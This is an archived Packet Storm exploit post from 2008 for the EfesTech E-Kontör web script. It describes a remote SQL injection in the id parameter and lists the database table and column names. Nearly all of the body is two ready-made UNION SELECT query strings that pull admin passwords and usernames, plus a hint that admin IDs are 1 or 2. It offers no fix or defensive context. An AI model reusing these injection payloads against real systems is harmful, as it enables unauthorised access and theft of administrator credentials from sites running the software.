efestechekontr-sql.txt

2008-03-24T00:00:00
ID PACKETSTORM:64827
Type packetstorm
Reporter Dj ReMix
Modified 2008-03-24T00:00:00

Description

                                        
                                            `##############################################################   
  
  
$Author = RMx  
$home page = www.coderx.org  
$thanks = Dynamic , TR_IP , Liz0zim  
$Script name = Efestech E-Kontör (tr)  
$script test = http://www.aspindir.com/Goster/5145  
$script sales = 750 YTL  
  
  
##############################################################   
// EfesTech E-Kontör (id) Remote SQL INJECTION  
  
// Table names   
  
id no = id  
password : sifre  
users = firma  
  
  
exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1  
explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1  
  
NOTe = İD values 1 or 2 for admin  
  
Bye   
`